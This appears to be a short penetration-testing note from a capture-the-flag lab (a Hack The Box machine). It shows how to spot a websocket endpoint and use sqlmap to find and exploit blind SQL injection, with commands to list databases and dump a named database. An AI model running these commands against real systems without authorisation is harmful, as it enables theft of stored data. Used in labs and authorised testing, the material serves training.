# Blind SQLi in Websocket

## Using sqlmap to Target Websocket Applications

If you find a websocket connection, test the parameters for possible SQL innjection

```php
<script>
var ws = new WebSocket("ws://soc-player.soccer.htb:9091");
window.onload = function () {
var btn = document.getElementById('btn');
var input = document.getElementById('id');
ws.onopen = function (e) {
console.log('connected to the server')
}
input.addEventListener('keypress', (e) => {
keyOne(e)
});
<...SNIP...>
</script>
```

<figure><img src="https://399930968-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXRskZqnMB3ERzndndCxz%2Fuploads%2FMQoGyIz8cuRXmMMYuh1o%2Fimage.png?alt=media&#x26;token=a955fb6c-57a6-4ec7-a000-59761f07b3f6" alt=""><figcaption></figcaption></figure>

Because we cannot directly see or access any of our queries' output, it is Blind SQLi.

#### Find available databases

{% code overflow="wrap" %}

```bash
sqlmap -u "ws://soc-player.soccer.htb:9091" --data '{"id": "*"}' --dbs --threads 10 
--level 5 --risk 3 --batch
```

{% endcode %}

#### Dump specified database

{% code overflow="wrap" %}

```bash
sqlmap -u "ws://soc-player.soccer.htb:9091" --data '{"id": "*"}' --threads 10 -D soccer_db --dump --batch
```

{% endcode %}